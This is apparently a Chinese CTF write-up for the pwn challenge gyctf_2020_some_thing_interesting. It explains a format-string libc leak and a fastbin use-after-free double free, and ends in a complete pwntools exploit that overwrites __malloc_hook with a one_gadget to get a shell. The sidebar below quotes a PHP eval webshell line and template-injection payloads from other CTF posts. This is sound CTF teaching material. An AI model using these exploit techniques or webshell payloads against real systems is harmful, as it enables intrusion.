gyctf_2020_some_thing_interesting

最新推荐文章于 2024-09-10 19:45:10 发布
最新推荐文章于 2024-09-10 19:45:10 发布
阅读量203 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132570091
版权

gyctf_2020_some_thing_interesting

uaf+格式化字符串

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

64位保护全开,

瞧一下ida

char *sub_B7A()
{
  memset(s1, 0, 0x14uLL);
  puts("#######################");
  puts("#       Surprise      #");
  puts("#---------------------#");
  printf("> Input your code please:");
  read(0, s1, 0x13uLL);
  if ( strncmp(s1, "OreOOrereOOreO", 0xEuLL) )
  {
    puts("Emmmmmm!Maybe you want Fool me!");
    exit(0);
  }
  puts("#---------------------#");
  puts("#      ALL Down!      #");
  puts("#######################");
  return s1;
}

这个东东先逆向,OreOOrereOOreO必须含有这个,这里占了0xf

我们能输入0x13但是他检测只检测写入的前0xe

然后读入的东西会进入到下面这里

unsigned __int64 __fastcall sub_D3D(const char *a1)
{
  unsigned __int64 v2; // [rsp+18h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  if ( dword_202010 )
  {
    puts("Now you are ....?");
    printf("# Your Code is ");
    printf(a1);
    putchar(10);
    puts("###############################################################################");
  }
  else
  {
    puts("Now you are Administrator!");
  }
  return __readfsqword(0x28u) ^ v2;
}

这里存在一个格式化字符串漏洞,刚好够0x13-0xf=0x5 %??$p极限(x

我们看看栈能泄露点啥东西
在这里插入图片描述

发现个__libc_start_main+240我们算出偏移是17

OreOOrereOOreO%17$p

有了libcbase下面随便打

unsigned __int64 ADD()
{
  int i; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("#######################");
  puts("#     Create Oreo     #");
  puts("#---------------------#");
  for ( i = 1; i <= 9 && *((_QWORD *)&unk_2020E0 + i) && BSSPTR1[i] && *((_QWORD *)&unk_2021A0 + i) && BSSPTR2[i]; ++i )
  {
    if ( i == 9 )
    {
      puts("#    so much Oreo!    #");
      puts("#######################");
      return __readfsqword(0x28u) ^ v2;
    }
  }
  printf("> O's length : ");
  _isoc99_scanf("%ld", &BSSPTR1[i]);
  if ( BSSPTR1[i] <= 0 || BSSPTR1[i] > 0x70 )
  {
    puts("Emmmmmm!Maybe you want Fool me!");
    EXIT();
  }
  *((_QWORD *)&unk_2020E0 + i) = malloc(BSSPTR1[i]);
  printf("> O : ");
  read(0, *((void **)&unk_2020E0 + i), BSSPTR1[i]);
  printf("> RE's length : ");
  _isoc99_scanf("%ld", &BSSPTR2[i]);
  if ( BSSPTR2[i] <= 0 || BSSPTR2[i] > 0x70 )
  {
    puts("Emmmmmm!Maybe you want Fool me!");
    EXIT();
  }
  printf("> RE : ");
  *((_QWORD *)&unk_2021A0 + i) = malloc(BSSPTR2[i]);
  read(0, *((void **)&unk_2021A0 + i), BSSPTR2[i]);
  puts("#---------------------#");
  puts("#      ALL Down!      #");
  puts("#######################");
  return __readfsqword(0x28u) ^ v2;
}

add这里,建了两个chunk,size都是fastbin大小的

unsigned __int64 EDIT()
{
  unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("#######################");
  puts("#     Modify Oreo     #");
  puts("#---------------------#");
  printf("> Oreo ID : ");
  _isoc99_scanf("%d", &v1);
  if ( v1 > 0xA
    || !*((_QWORD *)&unk_2020E0 + (int)v1)
    || !BSSPTR1[v1]
    || !*((_QWORD *)&unk_2021A0 + (int)v1)
    || !BSSPTR2[v1] )
  {
    puts("Emmmmmm!Maybe you want Fool me!");
    EXIT();
  }
  printf("> O : ");
  read(0, *((void **)&unk_2020E0 + (int)v1), BSSPTR1[v1]);
  printf("> RE : ");
  read(0, *((void **)&unk_2021A0 + (int)v1), BSSPTR2[v1]);
  puts("#---------------------#");
  puts("#      ALL Down!      #");
  puts("#######################");
  return __readfsqword(0x28u) ^ v2;
}

edit这里正常edit,有的师傅有用edit,直接改fd指针,效果一样的

unsigned __int64 DELE()
{
  unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("#######################");
  puts("#     Delete Oreo     #");
  puts("#---------------------#");
  printf("> Oreo ID : ");
  _isoc99_scanf("%d", &v1);
  if ( v1 > 0xA || !*((_QWORD *)&unk_2020E0 + (int)v1) )
  {
    puts("Emmmmmm!Maybe you want Fool me!");
    EXIT();
  }
  free(*((void **)&unk_2020E0 + (int)v1));
  free(*((void **)&unk_2021A0 + (int)v1));
  puts("#---------------------#");
  puts("#      ALL Down!      #");
  puts("#######################");
  return __readfsqword(0x28u) ^ v2;
}

uaf

show一般用来泄露libc,极个别用来改got表然后getshell,(或者还有其他

本题已经拿到libc了所以没啥用(-.-)

题目部署在libc-2.23

from pwn import*
from Yapack import *
libc=ELF('./libc-2.23.so')   

context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",29960,"./pwn",10)

sla(b'please:',b'OreOOrereOOreO%17$p')
sla(menu,b'0')
ru(b'OreOOrereOOreO0x')
leak=int(r.recv(12),16)-240-libc.sym['__libc_start_main']
li(leak)
malloc=mallochook(leak)
one=leak+0xf1147
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''

add(0x68,b'aaaa',0x68,b'bbbb')
dele(1)
dele(1)
#这里因为fastbin的特性,并且申请了两个chunk,所以直接free两次就行
add(0x68,p64(malloc-0x23),0x68,b'bbbb')
add(0x68,b'aaaa',0x68,b'b'*0x13+p64(one))
li(one)
sla(menu,b'1')
sla(b': ',b'1')
#debug()
ia()

在这里插入图片描述

YameMres
关注
专栏目录
C++11中的智能指针unique_ptr、shared_ptr和weak_ptr详解
dvlinker的技术专栏
05-28 3万+
详细讲解C++11中引入的智能指针unique_ptr、shared_ptr和weak_ptr。
[GYCTF2020] web题-Ezsqli
BROTHERYY的博客
12-30 428
这题一直出问题,用脚本跑到一半都会崩。 后面换了一个,能够跑出来。 详细情况可以看看Ying师傅的blog https://www.gem-love.com/ctf/1782.html 我把跑出来的代码贴出来可以参考下 # coding:utf-8 import requests import time url = 'http://2aa83373-6644-4c2f-904a-9f15560d4f1c.node3.buuoj.cn/' def str_hex(s): #十六进制转换 fl ==>
[GYCTF2020]EasyThinking
m0_63045593的博客
04-20 662
www.zip下有源码 thinkphp漏洞 登录时会有session 1234567890123456789012345678.php 可以修改注意是32位 有搜索功能 <?php @eval($_POST['123']);?> 搜索的结果会存在/runtime/session/下getshell/runtime/session/sess_1234567890123456789012345678.php 蚁剑链接根目录下有readflag但是ban了好多 之前的题在这个用不了 但是.
BUUCTF [web专项31][GYCTF2020]Blacklist
yanglinchiji的博客
11-07 62
我记得原本我总结了两种方法,一种是用handler获取flag,另一种是替换words的数据来进行输出获取flag。ok了,rename,alter被过滤掉了,第二种方法不行,还是用handler吧。而且只能获取1,2的数据,其他数据(数字,字符等)全都不显示好像。坏了,好熟悉的感觉,好像之前做过类似的题目,甚至大致模板都一样。我记得是用堆叠注入来获取库表之类的。第二种:顶替words来输出数据。出来了,进入FlagHere。第一种:handler。
巅峰极客snote
playmaker的博客
11-09 504
巅峰极客snote 链接:https://pan.baidu.com/s/1aAb4JjplV-MBj8iQCauI2Q 提取码:977o 复制这段内容后打开百度网盘手机App,操作更方便哦 查看保护&大致逻辑 是一个选单程序,且保护全开 功能分析 1.add 2.show dword_202014为1,只能泄露一次 3.delete dword_202010只能free一次,且...
GYCTF2020_Writeup
Lethe's Blog
03-15 2625
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
[GYCTF 2020] Web复现 wp
Alexhirchi的博客
07-30 1699
FlaskApp 要点:模板注入、Pin码 访问网站,提示了该网站由Flask框架搭建,进行简单测试,提供了base64加密和解密的功能,并开启了flask的dubug功能(输入错误的base64解码会出现报错界面) 猜测存在模板注入,构造payload:{{2+6}} base64加密,将结果进行解码,验证存在模板注入 构造payload获取python文件内容(通过之前的报错可以知道python文件名),循环查找catch_warnings,打开app.py读取内容 {% for c in []
BUUCTF-PWN刷题记录-7
weixin_44145820的博客
04-15 1043
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
Sim_EKB_Install_2020_04_17
05-24
PCS7 v8.0, TIA Poprtal, WinCC and key9999 Problems with new ALM v5 Simatic IT Business Objects Enterprise signed keys Official FAQ ...v2020.04.17 add some info for TIA Portal v16, Energy 7.2
C4.5.rar_C4.5 C++_c4.5_c4.5 builder_interesting
07-14
决策树算法C4.5源码, ...The directory Data contains some sample datasets. Many interesting data collections are maintained by the University of California, Irvine, in a data repository
DeviceAdminSample.rar_Do Nothing_cream7ps
09-24
Example of a do-nothing admin class. When enabled, it lets you control some of its policy and reports when there is interesting activity.
第六十二题——[GYCTF2020]FlaskApp
分享简单的安全技术
05-10 388
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,base64加密页面,题目给出flask提示,猜测使用模板注入 第二步:构建漏洞 在加密页面将{{7+7}}进行base64加密后,将密文使用解密页面解码,发现执行了7+7算法,确定了存在模板注入漏洞。 第三步:获取flag 使用{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %
Buuctf之Web(四)
qq_50589021的博客
11-22 1606
[HFCTF2020]JustEscape WP vm2沙盒逃逸 涉及到nodejs不会 [网鼎杯2018]Unfinish 脚本 # -*- coding: utf-8 -*- # @Author : Yn8rt # @Time : 2021/9/10 14:38 #coding:utf-8 import requests from bs4 import BeautifulSoup import time url = 'http://f8933a3b-5f22-4bde-bde9-7a49c4b
[GYCTF2020] web题-Blacklist
BROTHERYY的博客
07-24 538
复现环境:buuoj.cn 打开题目 发现过滤了一些关键字 发现跟强网杯的随便注一样,可以使用堆叠注入。 可以看到有FlagHere和words这两个表,过滤了一些关键字 这里使用mysql特有的查询-handler 通过handler table_name open打开一张表,在这里声明一个名为table_name的句柄。 通过handler table_name read first获取句柄的第一行,通过read next依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。 详细的
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 1012
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
注册安全分析报告:熊猫频道
Explinks的博客
09-10 585
熊猫频道作为央视的子频道, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 799
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
新书宣传:《量子安全:信息保护新纪元》
最新发布
Chahot的博客
09-10 555
你好!这是我第一次发布类广告的博文,目的也很单纯,希望以作者的身份介绍一下自己出版的图书——《量子安全:信息保护新纪元》。此书于2024年7月出版,目前各大平台有售,是电子工业出版社&博文视点旗下图书。本书从经典信息安全框架始详细阐述了网络安全的核心概念、关键技术及其应用,并对以量子密钥分发、量子隐态传输、超密编码等为代表的量子安全技术行了深的解析,以实际案例和故事为基础,增强了内容的趣味性和实用性,最后还揭示了前沿量子安全技术的研究成果与方向。
3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)
weixin_52173250的博客
09-07 1518
HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务器之间安全地传输数据
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值